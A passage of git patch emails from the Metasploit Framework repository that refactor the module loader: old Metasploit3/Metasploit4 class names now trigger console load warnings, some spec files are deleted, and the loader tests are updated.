initialize(attributes={}) - @minimum_api_version = attributes[:minimum_api_version] - @minimum_core_version = attributes[:minimum_core_version] - - message_parts = [] - message_parts << 'version check' - - if minimum_api_version or minimum_core_version - clause_parts = [] - - if minimum_api_version - clause_parts << "API >= #{minimum_api_version}" - end - - if minimum_core_version - clause_parts << "Core >= #{minimum_core_version}" - end - - clause = clause_parts.join(' and ') - message_parts << "(requires #{clause})" - end - - causal_message = message_parts.join(' ') - - super_attributes = { - :causal_message => causal_message - }.merge(attributes) - - super(super_attributes) - end - - # @return [Float] The minimum value of {Msf::Framework::VersionAPI} for the module to be compatible. - attr_reader :minimum_api_version - # @return [Float] The minimum value of {Msf::Framework::VersionCore} for the module to be compatible. - attr_reader :minimum_core_version - # @return [String] the path to the module that declared the RequiredVersions - attr_reader :module_path - # @return [String] the module reference name that declared the RequiredVersions - attr_reader :module_reference_name -end \ No newline at end of file diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index c047d6242c..d395288c87 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Joomla From 7dac21f58ccb7d283a09df2073958677f00c94fa Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 28 Dec 2015 23:02:14 +0100 Subject: [PATCH 217/686] do not fail on old class name --- lib/msf/core/modules/loader/base.rb | 20 +++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 617e449efa..851e2ec510 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -148,17 +148,31 @@ class Msf::Modules::Loader::Base return false end - if namespace_module.const_defined?('Metasploit3') || namespace_module.const_defined?('Metasploit4') + if namespace_module.const_defined?('Metasploit3') + klass = namespace_module.const_get('Metasploit3') load_error(module_path, Msf::Modules::Error.new({ :module_path => module_path, :module_reference_name => module_reference_name, :causal_message => 'Please change the module class name to Metasploit' })) + elsif namespace_module.const_defined?('Metasploit4') + klass = namespace_module.const_get('Metasploit4') + load_error(module_path, Msf::Modules::Error.new({ + :module_path => module_path, + :module_reference_name => module_reference_name, + :causal_message => 'Please change the module class name to Metasploit' + })) + elsif namespace_module.const_defined?('Metasploit') + klass = namespace_module.const_get('Metasploit') + else + load_error(module_path, Msf::Modules::Error.new({ + :module_path => module_path, + :module_reference_name => module_reference_name, + :causal_message => 'Invalid module (no Metasploit class or module name)' + })) return false end - klass = namespace_module.const_get('Metasploit') - if reload ilog("Reloading #{type} module #{module_reference_name}. Ambiguous module warnings are safe to ignore", 'core', LEV_2) else From f92f59a4c86724ef1f3f838f26a00aa4265aecaf Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 29 Dec 2015 00:10:07 +0100 Subject: [PATCH 218/686] remove corresponding spec files --- ...tasploit_class_compatibility_error_spec.rb | 8 - spec/lib/msf/core/modules/namespace_spec.rb | 268 ------------------ .../version_compatibility_error_spec.rb | 63 ---- 3 files changed, 339 deletions(-) delete mode 100644 spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb delete mode 100644 spec/lib/msf/core/modules/namespace_spec.rb delete mode 100644 spec/lib/msf/core/modules/version_compatibility_error_spec.rb diff --git a/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb b/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb deleted file mode 100644 index e4daf5f67c..0000000000 --- a/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb +++ /dev/null @@ -1,8 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -require 'msf/core/modules/metasploit_class_compatibility_error' - -RSpec.describe Msf::Modules::MetasploitClassCompatibilityError do - it_should_behave_like 'Msf::Modules::Error subclass #initialize' -end diff --git a/spec/lib/msf/core/modules/namespace_spec.rb b/spec/lib/msf/core/modules/namespace_spec.rb deleted file mode 100644 index 937920bdfd..0000000000 --- a/spec/lib/msf/core/modules/namespace_spec.rb +++ /dev/null @@ -1,268 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -require 'msf/core' -require 'msf/core/modules/namespace' - -RSpec.describe Msf::Modules::Namespace do - let(:module_path) do - "parent/path/type_directory/#{module_reference_name}.rb" - end - - let(:module_reference_name) do - 'module/reference/name' - end - - subject do - mod = Module.new - mod.extend described_class - - mod - end - - context 'metasploit_class' do - before(:example) do - if major - subject.const_set("Metasploit#{major}", Class.new) - end - end - - context 'without Metasploit constant defined' do - let(:major) do - nil - end - - it 'should not be defined' do - metasploit_constants = subject.constants.select { |constant| - constant.to_s =~ /Metasploit/ - } - - expect(metasploit_constants).to be_empty - end - end - - context 'with Metasploit1 constant defined' do - let(:major) do - 1 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit1')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit2 constant defined' do - let(:major) do - 2 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit2')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit3 constant defined' do - let(:major) do - 3 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit3')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit4 constant defined' do - let(:major) do - 4 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit4')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit5 constant defined' do - let(:major) do - 5 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit5')).to be_truthy - end - - it 'should be newer than Msf::Framework::Major' do - expect(major).to be > Msf::Framework::Major - end - - it 'should return nil' do - expect(subject.metasploit_class).to be_nil - end - end - end - - context 'metasploit_class!' do - it 'should call metasploit_class' do - expect(subject).to receive(:metasploit_class).and_return(Class.new) - - subject.metasploit_class!(module_path, module_reference_name) - end - - context 'with metasploit_class' do - let(:metasploit_class) do - Class.new - end - - before(:example) do - allow(subject).to receive(:metasploit_class).and_return(metasploit_class) - end - - it 'should return the metasploit_class' do - expect(subject.metasploit_class!(module_path, module_reference_name)).to eq metasploit_class - end - end - - context 'without metasploit_class' do - before(:example) do - allow(subject).to receive(:metasploit_class) - end - - it 'should raise a Msf::Modules::MetasploitClassCompatibilityError' do - expect { - subject.metasploit_class!(module_path, module_reference_name) - }.to raise_error(Msf::Modules::MetasploitClassCompatibilityError) - end - - context 'the Msf::Modules::MetasploitClassCompatibilityError' do - it 'should include the module path' do - error = nil - - begin - subject.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error - end - - expect(error).not_to be_nil - expect(error.to_s).to include(module_path) - end - - it 'should include the module reference name' do - error = nil - - begin - subject.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error - end - - expect(error).not_to be_nil - expect(error.to_s).to include(module_reference_name) - end - end - end - end - - context 'version_compatible!' do - context 'without RequiredVersions' do - it 'should not be defined' do - expect(subject.const_defined?('RequiredVersions')).to be_falsey - end - - it 'should not raise an error' do - expect { - subject.version_compatible!(module_path, module_reference_name) - }.to_not raise_error - end - end - - context 'with RequiredVersions defined' do - let(:minimum_api_version) do - 1 - end - - let(:minimum_core_version) do - 1 - end - - before(:example) do - subject.const_set( - :RequiredVersions, - [ - minimum_core_version, - minimum_api_version - ] - ) - end - - context 'with minimum Core version' do - it 'is <= Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_core_version.to_s)).to be <= Metasploit::Framework::Core::GEM_VERSION - end - - context 'without minimum API version' do - let(:minimum_api_version) do - 2 - end - - it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - - context 'with minimum API version' do - it 'should not raise an error' do - expect { - subject.version_compatible!(module_path, module_reference_name) - }.to_not raise_error - end - end - end - - context 'without minimum Core version' do - let(:minimum_core_version) do - 5 - end - - it 'is > Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_core_version.to_s)).to be > Metasploit::Framework::Core::GEM_VERSION - end - - context 'without minimum API version' do - let(:minimum_api_version) do - 2 - end - - it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - - context 'with minimum API version' do - it 'is <= Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be <= Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - end - end - end -end diff --git a/spec/lib/msf/core/modules/version_compatibility_error_spec.rb b/spec/lib/msf/core/modules/version_compatibility_error_spec.rb deleted file mode 100644 index 8e732966a3..0000000000 --- a/spec/lib/msf/core/modules/version_compatibility_error_spec.rb +++ /dev/null @@ -1,63 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -RSpec.describe Msf::Modules::VersionCompatibilityError do - it_should_behave_like 'Msf::Modules::Error subclass #initialize' do - let(:minimum_api_version) do - 1 - end - - let(:minimum_core_version) do - 2 - end - - it 'should say cause was version check' do - expect(subject.to_s).to match(/due to version check/) - end - - context 'with :minimum_api_version' do - subject do - described_class.new( - :minimum_api_version => minimum_api_version - ) - end - - it 'should set minimum_api_version' do - expect(subject.minimum_api_version).to eq minimum_api_version - end - - it 'should include minimum_api_version in error' do - expect(subject.to_s).to match(/due to version check \(requires API >= #{minimum_api_version}\)/) - end - end - - context 'with :minimum_api_version and :minimum_core_version' do - subject do - described_class.new( - :minimum_api_version => minimum_api_version, - :minimum_core_version => minimum_core_version - ) - end - - it 'should include minimum_api_version and minimum_core_version in error' do - expect(subject.to_s).to match(/due to version check \(requires API >= #{minimum_api_version} and Core >= #{minimum_core_version}\)/) - end - end - - context 'with :minimum_core_version' do - subject do - described_class.new( - :minimum_core_version => minimum_core_version - ) - end - - it 'should set minimum_core_version' do - expect(subject.minimum_core_version).to eq minimum_core_version - end - - it 'should include minimum_core_version in error' do - expect(subject.to_s).to match(/due to version check \(requires Core >= #{minimum_core_version}\)/) - end - end - end -end From 8f4752d11e6fc9c87fb2506ff5c918ddbbe5bc38 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 29 Dec 2015 10:37:09 +0100 Subject: [PATCH 219/686] show load warnings to the user --- lib/msf/core/module_manager.rb | 1 + lib/msf/core/module_manager/loading.rb | 2 +- lib/msf/core/modules/loader/base.rb | 29 ++++++++++++------- lib/msf/ui/console/command_dispatcher/core.rb | 7 +++++ lib/msf/ui/console/driver.rb | 7 +++++ 5 files changed, 35 insertions(+), 11 deletions(-) diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb index c8ebc14c21..ed9740634a 100644 --- a/lib/msf/core/module_manager.rb +++ b/lib/msf/core/module_manager.rb @@ -120,6 +120,7 @@ module Msf self.module_info_by_path = {} self.enablement_by_type = {} self.module_load_error_by_path = {} + self.module_load_warnings = {} self.module_paths = [] self.module_set_by_type = {} diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index 415107d82d..c7bb4a0bb5 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -50,7 +50,7 @@ module Msf::ModuleManager::Loading changed end - attr_accessor :module_load_error_by_path + attr_accessor :module_load_error_by_path, :module_load_warnings # Called when a module is initially loaded such that it can be categorized # accordingly. diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 851e2ec510..290c2d353e 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -150,18 +150,10 @@ class Msf::Modules::Loader::Base if namespace_module.const_defined?('Metasploit3') klass = namespace_module.const_get('Metasploit3') - load_error(module_path, Msf::Modules::Error.new({ - :module_path => module_path, - :module_reference_name => module_reference_name, - :causal_message => 'Please change the module class name to Metasploit' - })) + load_warning(module_path, 'Please change the modules class name from Metasploit3 to Metasploit') elsif namespace_module.const_defined?('Metasploit4') klass = namespace_module.const_get('Metasploit4') - load_error(module_path, Msf::Modules::Error.new({ - :module_path => module_path, - :module_reference_name => module_reference_name, - :causal_message => 'Please change the module class name to Metasploit' - })) + load_warning(module_path, 'Please change the modules class name from Metasploit4 to Metasploit') elsif namespace_module.const_defined?('Metasploit') klass = namespace_module.const_get('Metasploit') else @@ -426,6 +418,23 @@ class Msf::Modules::Loader::Base elog(log_message) end + # Records the load warning to {Msf::ModuleManager::Loading#module_load_warnings} and the log. + # + # @param [String] module_path Path to the module as returned by {#module_path}. + # @param [String] Error message that caused the warning. + # @return [void] + # + # @see #module_path + def load_warning(module_path, error) + module_manager.module_load_warnings[module_path] = error.to_s + + log_lines = [] + log_lines << "#{module_path} generated a warning during load:" + log_lines << error.to_s + log_message = log_lines.join("\n") + wlog(log_message) + end + # @return [Msf::ModuleManager] The module manager for which this loader is loading modules. attr_reader :module_manager diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index c76bd76923..0b8e31873e 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -223,6 +223,13 @@ class Core end end + if framework.modules.module_load_warnings.length > 0 + print_warning("The following modules were loaded with warnings:") + framework.modules.module_load_warnings.each do |path, error| + print_warning("\t#{path}: #{error}") + end + end + cmd_banner() end diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index d2292ba6a9..5890ac111a 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -535,6 +535,13 @@ class Driver < Msf::Ui::Driver end end + if framework.modules.module_load_warnings.length > 0 + print_warning("The following modules were loaded with warnings:") + framework.modules.module_load_warnings.each do |path, error| + print_warning("\t#{path}: #{error}") + end + end + framework.events.on_ui_start(Msf::Framework::Revision) if $msf_spinner_thread From 0546911eef36d5c531a5d648ed46ae1a59dc91b3 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 29 Dec 2015 12:42:02 +0100 Subject: [PATCH 220/686] fix error when invalid classname eg "class Metasploit1 < .." --- lib/msf/core/modules/loader/base.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 290c2d353e..ae445cbb26 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -148,13 +148,13 @@ class Msf::Modules::Loader::Base return false end - if namespace_module.const_defined?('Metasploit3') + if namespace_module.const_defined?('Metasploit3', false) klass = namespace_module.const_get('Metasploit3') load_warning(module_path, 'Please change the modules class name from Metasploit3 to Metasploit') - elsif namespace_module.const_defined?('Metasploit4') + elsif namespace_module.const_defined?('Metasploit4', false) klass = namespace_module.const_get('Metasploit4') load_warning(module_path, 'Please change the modules class name from Metasploit4 to Metasploit') - elsif namespace_module.const_defined?('Metasploit') + elsif namespace_module.const_defined?('Metasploit', false) klass = namespace_module.const_get('Metasploit') else load_error(module_path, Msf::Modules::Error.new({ From 02841c79c3be20ed09f66bc586401514161ce935 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 29 Dec 2015 16:05:29 +0100 Subject: [PATCH 221/686] some slight changes --- lib/msf/core/modules/loader/base.rb | 31 +++++++++++++---------------- 1 file changed, 14 insertions(+), 17 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index ae445cbb26..13992d27c0 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -98,12 +98,9 @@ class Msf::Modules::Loader::Base # @option options [Boolean] :reload (false) whether this is a reload. # # @return [false] if :force is false and parent_path has not changed. - # @return [false] if exception encountered while parsing module - # content - # @return [false] if the module is incompatible with the Core or API - # version. - # @return [false] if the module does not implement a Metasploit(\d+) - # class. + # @return [false] if exception encountered while parsing module content + # @return [false] if the module is incompatible with the Core or API version. + # @return [false] if the module does not implement a Metasploit class. # @return [false] if the module's is_usable method returns false. # @return [true] if all those condition pass and the module is # successfully loaded. @@ -149,13 +146,13 @@ class Msf::Modules::Loader::Base end if namespace_module.const_defined?('Metasploit3', false) - klass = namespace_module.const_get('Metasploit3') + klass = namespace_module.const_get('Metasploit3', false) load_warning(module_path, 'Please change the modules class name from Metasploit3 to Metasploit') elsif namespace_module.const_defined?('Metasploit4', false) - klass = namespace_module.const_get('Metasploit4') + klass = namespace_module.const_get('Metasploit4', false) load_warning(module_path, 'Please change the modules class name from Metasploit4 to Metasploit') elsif namespace_module.const_defined?('Metasploit', false) - klass = namespace_module.const_get('Metasploit') + klass = namespace_module.const_get('Metasploit', false) else load_error(module_path, Msf::Modules::Error.new({ :module_path => module_path, @@ -316,9 +313,9 @@ class Msf::Modules::Loader::Base protected - # Returns a nested module to wrap the Metasploit(1|2|3) class so that it doesn't overwrite other (metasploit) - # module's classes. The wrapper module must be named so that active_support's autoloading code doesn't break when - # searching constants from inside the Metasploit(1|2|3) class. + # Returns a nested module to wrap the Metasploit class so that it doesn't overwrite other (metasploit) + # module's classes. The wrapper module must be named so that active_support's autoloading code doesn't break when + # searching constants from inside the Metasploit class. # # @param namespace_module_names [Array] # {NAMESPACE_MODULE_NAMES} + @@ -328,7 +325,7 @@ class Msf::Modules::Loader::Base # @see NAMESPACE_MODULE_CONTENT def create_namespace_module(namespace_module_names) # In order to have constants defined in Msf resolve without the Msf qualifier in the module_content, the - # Module.nesting must resolve for the entire nesting. Module.nesting is strictly lexical, and can't be faked with + # Module.nesting must resolve for the entire nesting. Module.nesting is strictly lexical, and can't be faked with # module_eval(&block). (There's actually code in ruby's implementation to stop module_eval from being added to # Module.nesting when using the block syntax.) All this means is the modules have to be declared as a string that # gets module_eval'd. @@ -451,7 +448,7 @@ class Msf::Modules::Loader::Base raise ::NotImplementedError end - # Returns whether the path could refer to a module. The path would still need to be loaded in order to check if it + # Returns whether the path could refer to a module. The path would still need to be loaded in order to check if it # actually is a valid module. # # @param [String] path to module without the type directory. @@ -498,8 +495,8 @@ class Msf::Modules::Loader::Base end # Returns an Array of names to make a fully qualified module name to - # wrap the Metasploit(1|2|3) class so that it doesn't overwrite other - # (metasploit) module's classes. Invalid module name characters are + # wrap the Metasploit class so that it doesn't overwrite other + # (metasploit) module's classes. Invalid module name characters are # escaped by using 'H*' unpacking and prefixing each code with X so # the code remains a valid module name when it starts with a digit. # @@ -622,7 +619,7 @@ class Msf::Modules::Loader::Base self.class.typed_path(type, module_reference_name) end - # Returns whether the metasploit_class is usable on the current system. Defer's to metasploit_class's #is_usable if + # Returns whether the metasploit_class is usable on the current system. Defer's to metasploit_class's #is_usable if # it is defined. # # @param [Msf::Module] metasploit_class As returned by {Msf::Modules::Namespace#metasploit_class} From 158b1e473c5eb819642a29758ceb4558f315e675 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 22 Jan 2016 14:19:12 +0100 Subject: [PATCH 222/686] revert value --- lib/msf/core/modules/loader/base.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 13992d27c0..548d3fe7ec 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -24,7 +24,7 @@ class Msf::Modules::Loader::Base Msf::MODULE_POST => 'post' } # This must calculate the first line of the NAMESPACE_MODULE_CONTENT string so that errors are reported correctly - NAMESPACE_MODULE_LINE = __LINE__ + 1 + NAMESPACE_MODULE_LINE = __LINE__ + 4 # By calling module_eval from inside the module definition, the lexical scope is captured and available to the code in # module_content. NAMESPACE_MODULE_CONTENT = <<-EOS From e6147d60e2ec011817ebc190b798b456a0218ebf Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 22 Jan 2016 23:32:22 +0100 Subject: [PATCH 223/686] fix rspecs --- lib/msf/core/modules/loader/base.rb | 24 -- spec/lib/msf/core/modules/loader/base_spec.rb | 365 ++++-------------- 2 files changed, 79 insertions(+), 310 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 548d3fe7ec..539593413f 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -619,28 +619,4 @@ class Msf::Modules::Loader::Base self.class.typed_path(type, module_reference_name) end - # Returns whether the metasploit_class is usable on the current system. Defer's to metasploit_class's #is_usable if - # it is defined. - # - # @param [Msf::Module] metasploit_class As returned by {Msf::Modules::Namespace#metasploit_class} - # @return [false] if metasploit_class.is_usable returns false. - # @return [true] if metasploit_class does not respond to is_usable. - # @return [true] if metasploit_class.is_usable returns true. - def usable?(metasploit_class) - # If the module indicates that it is not usable on this system, then we - # will not try to use it. - usable = false - - if metasploit_class.respond_to? :is_usable - begin - usable = metasploit_class.is_usable - rescue => error - elog("Exception caught during is_usable check: #{error}") - end - else - usable = true - end - - usable - end end diff --git a/spec/lib/msf/core/modules/loader/base_spec.rb b/spec/lib/msf/core/modules/loader/base_spec.rb index d85bbea547..d04a9f03e6 100644 --- a/spec/lib/msf/core/modules/loader/base_spec.rb +++ b/spec/lib/msf/core/modules/loader/base_spec.rb @@ -12,7 +12,7 @@ RSpec.describe Msf::Modules::Loader::Base do let(:malformed_module_content) do <<-EOS - class Metasploit3 + class Metasploit # purposeful typo to check that module path is used in backtrace inclde Exploit::Remote::Tcp end @@ -21,7 +21,7 @@ RSpec.describe Msf::Modules::Loader::Base do let(:module_content) do <<-EOS - class Metasploit3 < Msf::Auxiliary + class Metasploit < Msf::Auxiliary # fully-qualified name is Msf::GoodRanking, so this will failing if lexical scope is not captured Rank = GoodRanking end @@ -223,7 +223,7 @@ RSpec.describe Msf::Modules::Loader::Base do context 'instance methods' do let(:module_manager) do - double('Module Manager', :module_load_error_by_path => {}) + double('Module Manager', :module_load_error_by_path => {}, :module_load_warnings => {}) end subject do @@ -309,7 +309,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod617578696c696172792f72737065632f6d6f636b - class Metasploit3 < Msf::Auxiliary + class Metasploit < Msf::Auxiliary end end @@ -424,51 +424,12 @@ RSpec.describe Msf::Modules::Loader::Base do allow(error).to receive(:backtrace).and_return(backtrace) end - context 'with version compatibility' do - before(:example) do - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - end - - it 'should record the load error using the original error' do - expect(subject).to receive(:load_error).with(module_path, error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - end - - context 'without version compatibility' do - let(:version_compatibility_error) do - Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => infinity, - :minimum_core_version => infinity - ) - end - - let(:infinity) do - 0.0 / 0.0 - end - - before(:example) do - allow(@namespace_module).to receive( - :version_compatible! - ).with( - module_path, - module_reference_name - ).and_raise( - version_compatibility_error - ) - end - - it 'should record the load error using the Msf::Modules::VersionCompatibilityError' do - expect(subject).to receive(:load_error).with(module_path, version_compatibility_error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end + it 'should record the load error using the original error' do + expect(subject).to receive(:load_error).with(module_path, error) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey end it 'should return false' do - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey end end @@ -479,9 +440,13 @@ RSpec.describe Msf::Modules::Loader::Base do @namespace_module = double('Namespace Module') allow(@namespace_module).to receive(:parent_path=) allow(@namespace_module).to receive(:module_eval_with_lexical_scope).with(module_content, module_path) - - metasploit_class = double('Metasploit Class', :parent => @namespace_module) - allow(@namespace_module).to receive(:metasploit_class!).and_return(metasploit_class) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit3', false).and_return(false) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit4', false).and_return(false) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit', false).and_return(true) + allow(@namespace_module).to receive(:const_get).with('Metasploit3', false).and_return(false) + allow(@namespace_module).to receive(:const_get).with('Metasploit4', false).and_return(false) + allow(@namespace_module).to receive(:const_get).with('Metasploit', false).and_return(true) + allow(@namespace_module).to receive(:module_load_warnings) allow(subject).to receive(:namespace_module_transaction).and_yield(@namespace_module) @@ -489,210 +454,83 @@ RSpec.describe Msf::Modules::Loader::Base do @module_load_error_by_path = {} allow(module_manager).to receive(:module_load_error_by_path).and_return(@module_load_error_by_path) + allow(module_manager).to receive(:on_module_load) + # remove the mocked namespace_module since happy-path/real loading is occurring in this context + allow(subject).to receive(:namespace_module_transaction).and_call_original end - it 'should check for version compatibility' do + it 'should log load information' do + expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_2) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + end + + it 'should delete any pre-existing load errors from module_manager.module_load_error_by_path' do + original_load_error = "Back in my day this module didn't load" + module_manager.module_load_error_by_path[module_path] = original_load_error + + expect(module_manager.module_load_error_by_path[module_path]).to eq original_load_error + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + expect(module_manager.module_load_error_by_path[module_path]).to be_nil + end + + it 'should return true' do + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + end + + it 'should call module_manager.on_module_load' do expect(module_manager).to receive(:on_module_load) - - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - subject.load_module(parent_path, type, module_reference_name) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy end - context 'without version compatibility' do - let(:version_compatibility_error) do - Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => infinity, - :minimum_core_version => infinity - ) - end - - let(:infinity) do - 0.0 / 0.0 - end - - before(:example) do - allow(@namespace_module).to receive( - :version_compatible! - ).with( - module_path, - module_reference_name - ).and_raise( - version_compatibility_error - ) - end - - it 'should record the load error' do - expect(subject).to receive(:load_error).with(module_path, version_compatibility_error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do + context 'with :recalculate_by_type' do + it 'should set the type to be recalculated' do + recalculate_by_type = {} + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :recalculate_by_type => recalculate_by_type + ) + ).to eq true + expect(recalculate_by_type[type]).to be_truthy end end - context 'with version compatibility' do - before(:example) do - allow(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) + context 'with :count_by_type' do + it 'should set the count to 1 if it does not exist' do + count_by_type = {} - allow(module_manager).to receive(:on_module_load) + expect(count_by_type.has_key?(type)).to be_falsey + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :count_by_type => count_by_type + ) + ).to eq true + expect(count_by_type[type]).to eq 1 end - context 'without metasploit_class' do - let(:error) do - Msf::Modules::MetasploitClassCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name + it 'should increment the count if it does exist' do + original_count = 1 + count_by_type = { + type => original_count + } + + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :count_by_type => count_by_type ) - end + ).to eq true - before(:example) do - expect(@namespace_module).to receive(:metasploit_class!).with(module_path, module_reference_name).and_raise(error) - end - - it 'should record load error' do - expect(subject).to receive( - :load_error - ).with( - module_path, - kind_of(Msf::Modules::MetasploitClassCompatibilityError) - ) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - expect(Msf::Modules.const_defined?(relative_name)).to be_truthy - expect(Msf::Modules.const_get(relative_name)).to eq @original_namespace_module - end - end - - context 'with metasploit_class' do - let(:metasploit_class) do - double('Metasploit Class') - end - - before(:example) do - allow(@namespace_module).to receive(:metasploit_class!).and_return(metasploit_class) - end - - it 'should check if it is usable' do - expect(subject).to receive(:usable?).with(metasploit_class).and_return(true) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - context 'without usable metasploit_class' do - before(:example) do - expect(subject).to receive(:usable?).and_return(false) - end - - it 'should log information' do - expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_1) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - expect(Msf::Modules.const_defined?(relative_name)).to be_truthy - expect(Msf::Modules.const_get(relative_name)).to eq @original_namespace_module - end - end - - context 'with usable metasploit_class' do - before(:example) do - # remove the mocked namespace_module since happy-path/real loading is occurring in this context - allow(subject).to receive(:namespace_module_transaction).and_call_original - end - - it 'should log load 